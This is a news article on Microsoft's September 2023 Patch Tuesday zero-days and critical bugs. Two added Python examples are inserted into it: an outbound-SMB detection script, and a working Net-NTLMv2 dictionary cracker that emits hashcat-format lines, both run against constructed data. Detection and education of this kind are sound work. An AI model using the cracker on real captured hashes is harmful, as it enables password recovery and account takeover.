Microsoft Patches a Pair of Actively Exploited Zero-Days
Microsoft addressed five critical security vulnerabilities in its September Patch Tuesday update, along with two "important"-rated zero-days under active attack in the wild.
In total, Microsoft released 59 new patches for bugs across its product line: Windows, Exchange Server, Office, .NET and Visual Studio, Azure, Microsoft Dynamics, and Windows Defender.
The update also incorporates a handful of third-party issues, including an actively exploited, critical Chromium zero-day that affects Microsoft Edge. Counting those external issues, the total comes to 65 CVEs.
Despite the breadth of the fixes, researchers noted that patching prioritization is fairly straightforward this month: the zero-days, the critical bugs, and the issues in Microsoft Exchange Server and the Windows TCP/IP stack should go to the front of the line for most organizations.
While two of the CVEs are listed as having been exploited by threat actors in the wild before the patches shipped, only one is listed as publicly known. Both belong at the top of the patching list.
The public bug is in Microsoft Word (CVE-2023-36761, CVSS 6.2). It is classified as an "information disclosure" issue, but Dustin Childs, researcher with Trend Micro's Zero Day Initiative (ZDI), noted that the label understates its severity.
"An attacker could use this vulnerability to allow the disclosure of NTLM hashes, which would then presumably be used in an NTLM-relay style attack," he explained in a Tuesday posting on Microsoft's September patch release. "Regardless of the classification, the preview pane is a vector here as well, which means no user interaction is required. Definitely put this one on the top of your test-and-deploy list."
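The disclosure Childs describes only pays off for the attacker once the victim's machine actually sends an NTLM authentication outward to a server the attacker controls, which for a document-based lure normally means outbound SMB (TCP 445 or 139). Blocking that egress at the perimeter is Microsoft's long-standing guidance for this class of bug, and the same traffic is a useful detection signal while patches roll out. The following Python is an added example, not code from this article or from Microsoft: it scans a constructed firewall export (the key=value format, hosts and timestamps are all made up for the example, and the IANA documentation ranges 192.0.2.0/24, 198.51.100.0/24 and 203.0.113.0/24 stand in for public Internet addresses) and reports every internal host that reached for SMB on anything outside the organization's own ranges.

```python
"""Flag outbound SMB from internal hosts to addresses outside the organisation.

An NTLM hash disclosure like the Word bug above only helps the attacker once
the victim machine authenticates to a server the attacker controls, normally
over SMB. Outbound TCP 445/139 to a non-corporate address is therefore a
strong, cheap signal while patches roll out.

Everything in SAMPLE_LOG (format, hosts, times) is constructed for this example.
"""
import ipaddress
from collections import defaultdict

# Ranges this (hypothetical) organisation considers internal. Anything else is
# treated as external; the IANA documentation prefixes used in SAMPLE_LOG are
# deliberately NOT listed here so they act as stand-ins for public addresses.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "fc00::/7", "fe80::/10",
)]
SMB_PORTS = {445, 139}

# Constructed firewall export, one space-separated key=value record per line.
SAMPLE_LOG = """\
ts=2023-09-12T14:02:11Z src=10.20.4.17 dst=10.20.0.5 dport=445 proto=tcp action=allow
ts=2023-09-12T14:02:19Z src=10.20.4.17 dst=203.0.113.44 dport=445 proto=tcp action=allow
ts=2023-09-12T14:02:20Z src=10.20.4.17 dst=203.0.113.44 dport=445 proto=tcp action=allow
ts=2023-09-12T14:03:02Z src=10.20.4.31 dst=198.51.100.9 dport=443 proto=tcp action=allow
ts=2023-09-12T14:03:40Z src=10.20.4.31 dst=198.51.100.9 dport=139 proto=tcp action=deny
ts=2023-09-12T14:04:05Z src=10.20.5.8 dst=192.0.2.77 dport=445 proto=udp action=allow
garbage line that does not parse
"""


def parse_record(line):
    """Split 'k=v k=v ...' into a dict; tokens without '=' are ignored."""
    fields = {}
    for token in line.split():
        key, sep, value = token.partition("=")
        if sep:
            fields[key] = value
    return fields


def is_internal(addr):
    """True if addr falls in one of INTERNAL_NETS (v4 or v6; mixed families never match)."""
    return any(addr in net for net in INTERNAL_NETS)


def is_external_smb(rec):
    """True for TCP to an SMB port at an address outside INTERNAL_NETS."""
    try:
        dst = ipaddress.ip_address(rec["dst"])
        dport = int(rec["dport"])
    except (KeyError, ValueError):
        return False
    if rec.get("proto", "").lower() != "tcp" or dport not in SMB_PORTS:
        return False
    return not is_internal(dst)


def find_smb_egress(log_text):
    """Map each internal source to the sorted external (dst, port, action) tuples it hit.

    Denied attempts are kept on purpose: a block at the firewall still means a
    client tried to authenticate outward, which is exactly the event to chase.
    """
    hits = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_record(line)
        if is_external_smb(rec):
            hits[rec.get("src", "?")].add((rec["dst"], int(rec["dport"]), rec.get("action", "?")))
    return {src: sorted(dsts) for src, dsts in hits.items()}


if __name__ == "__main__":
    for src, dsts in find_smb_egress(SAMPLE_LOG).items():
        for dst, port, action in dsts:
            print(f"{src} -> {dst}:{port} ({action})  possible NTLM leak; find what opened the document")
```

On the constructed log this reports 10.20.4.17 (allowed SMB to 203.0.113.44) and 10.20.4.31 (a denied attempt on 139), while ignoring internal file-server traffic and UDP noise. One caveat: when SMB is blocked, Windows clients can fall back to WebDAV over 80/443, which this rule will not see; that traffic needs proxy or endpoint telemetry instead.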
The other zero-day is a local privilege escalation in Windows (CVE-2023-36802, CVSS 7.8), specifically in the Microsoft Streaming Service Proxy, a component associated with Microsoft Stream (formerly known as Office 365 Video). For successful exploitation, an attacker who already has local access would need to run a specially crafted program, which could elevate privileges to administrator or SYSTEM, according to the advisory.
"It is the eighth elevation of privilege zero-day vulnerability exploited in the wild in 2023," Satnam Narang, senior staff research engineer at Tenable, tells Dark Reading. "Because attackers have a myriad of ways of breaching organizations, simply getting access to a system may not always be enough, which is where elevation of privilege flaws become that much more valuable, especially zero-days."
When it comes to the critical bugs, one of the more concerning is CVE-2023-29332, in Azure Kubernetes Service (AKS). It could allow a remote, unauthenticated attacker to gain Kubernetes cluster administrator privileges.
"This one stands out as it can be reached from the Internet, requires no user interaction, and is listed as low complexity," Childs warned in his post. "Based on the remote, unauthenticated aspect of this bug, this could prove quite tempting for attackers."
Three of the critical-rated patches are RCE problems that affect Visual Studio (CVE-2023-36792, CVE-2023-36793, and CVE-2023-36796, all with a CVSS score of 7.8). Each could lead to arbitrary code execution when a malicious package file is opened with an affected version of the software.
"Given Visual Studio's widespread usage among developers, the impact of such vulnerabilities could have a domino effect, spreading harm well beyond the initially compromised system," Tom Bowyer, Automox manager for product security, said in a post. "In the worst-case scenario, this could mean the theft or corruption of proprietary source code, the introduction of backdoors, or malicious tampering that could turn your application into a launchpad for attacks on others."
The final critical issue is CVE-2023-38148 (CVSS 8.8, the most severe that Microsoft patched this month), which allows unauthenticated remote code execution via the Internet Connection Sharing (ICS) function in Windows. Its risk is tempered by the fact that an attacker must be network-adjacent (on the same local segment as the target), and most organizations no longer use ICS. Those still using it, however, should patch immediately.
"If attackers successfully exploit this vulnerability, there could be a total loss of confidentiality, integrity, and availability," says Natalie Silva, lead cybersecurity engineer for Immersive Labs. "An unauthorized attacker could exploit this vulnerability by sending a specially crafted network packet to the service. This could lead to the execution of arbitrary code, potentially resulting in unauthorized access, data manipulation, or disruption of services."
Also included in the September update are a set of Microsoft Exchange Server bugs that Microsoft's exploitability assessment rates as "more likely to be exploited."
"While none of these attacks result in RCE on the server itself, it could allow a network-adjacent attacker with valid credentials to alter user data or elicit a Net-NTLMv2 hash for a targeted user account, which in turn could be cracked to recover a user password or relayed internally in the network to attack another service," says Robert Reeves, principal cybersecurity engineer at Immersive.
He adds, "If privileged users — those with Domain Admin or similar permissions within the network — have a mailbox created on Exchange, contrary to Microsoft's security advice, such a relay attack could have significant consequences."
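Reeves' point that a captured Net-NTLMv2 hash "could be cracked to recover a user password" (and Childs' concern above about the Word bug leaking NTLM material) comes down to how cheaply the response can be recomputed per guess: the client's NTProofStr is HMAC-MD5 over the server challenge and client blob, keyed with the NTLMv2 hash, which is itself HMAC-MD5 of UPPER(user) + domain keyed with the NT hash (MD4 of the UTF-16LE password). The Python below is an added example, not code from this article or from any of the quoted vendors. The "captured" exchange is constructed: the user name, domain, server challenge, client blob and wordlist are invented, and the NTProofStr is fabricated inline from a known password so the script checks itself offline. It also emits the user::domain:challenge:proof:blob line that hashcat's mode 5600 consumes.

```python
"""Recover a password from a captured Net-NTLMv2 exchange by dictionary attack.

NTProofStr = HMAC-MD5(NTLMv2hash, server_challenge || blob)
NTLMv2hash = HMAC-MD5(NThash, UTF16LE(UPPER(user) || domain))
NThash     = MD4(UTF16LE(password))
None of this is reversible, but each guess costs one MD4 and two HMAC-MD5s,
so weak passwords fall to a wordlist. The capture below is constructed.
"""
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often missing under OpenSSL 3."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK32

    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    order2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    order3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a = rotl((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = rotl((a + g(b, c, d) + x[order2[i]] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = rotl((a + h(b, c, d) + x[order3[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    # NTOWFv2: the user name is upper-cased, the domain is used exactly as sent.
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    return hmac.new(ntlmv2_hash(password, user, domain), server_challenge + blob, hashlib.md5).digest()


# Constructed capture; real values come from the NTLMSSP CHALLENGE/AUTHENTICATE messages.
CAPTURE = {
    "user": "jsmith",
    "domain": "CORP",
    "server_challenge": bytes.fromhex("1122334455667788"),
    "blob": bytes.fromhex(
        "0101000000000000"              # RespType, HiRespType, reserved
        "00d0e3a9f1d9d901"              # timestamp (invented)
        "a1b2c3d4e5f60718"              # client nonce (invented)
        "00000000"                      # reserved
        "02000800" "43004f0052005000"   # AV_PAIR: NetBIOS domain name 'CORP'
        "00000000" "00000000"           # MsvAvEOL, trailing reserved
    ),
}
# Fabricate the 'captured' response from a known password so the demo checks itself.
CAPTURE["nt_proof"] = nt_proof("Autumn2023!", CAPTURE["user"], CAPTURE["domain"],
                               CAPTURE["server_challenge"], CAPTURE["blob"])

# Invented wordlist; a real run would feed hashcat a large list plus rules.
WORDLIST = ["Password1", "Summer2023!", "Welcome1", "Autumn2023!", "P@ssw0rd"]


def to_hashcat_5600(capture) -> str:
    """Format the exchange as the user::domain:challenge:proof:blob line hashcat mode 5600 takes."""
    return "{}::{}:{}:{}:{}".format(capture["user"], capture["domain"],
                                   capture["server_challenge"].hex(),
                                   capture["nt_proof"].hex(), capture["blob"].hex())


def crack(capture, wordlist):
    """Return the first candidate whose recomputed NTProofStr matches, else None."""
    for candidate in wordlist:
        guess = nt_proof(candidate, capture["user"], capture["domain"],
                         capture["server_challenge"], capture["blob"])
        if hmac.compare_digest(guess, capture["nt_proof"]):
            return candidate
    return None


if __name__ == "__main__":
    print(to_hashcat_5600(CAPTURE))
    print("recovered password:", crack(CAPTURE, WORDLIST))
```

The defensive reading of this loop is that the only thing standing between a leaked Net-NTLMv2 response and the plaintext is password entropy; relaying the same response to another service does not even need the loop, which is why SMB signing, Extended Protection for Authentication on Exchange, and restricting NTLM where possible matter alongside the patches.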
And finally, researchers at Automox flagged a denial-of-service (DoS) vulnerability in Windows TCP/IP (CVE-2023-38149, CVSS 7.5) as one to prioritize.
The bug affects any networked system, and "allows an attacker via a network vector to disrupt the service without any user authentication or high complexity," said Automox CISO Jason Kikta, in a breakdown of Patch Tuesday. "This vulnerability represents a significant threat ... to the digital landscape. These weaknesses can be exploited to overload servers, disrupting the normal functioning of networks and services, and causing them to become unavailable to users."
That said, systems with IPv6 disabled are not affected by this bug.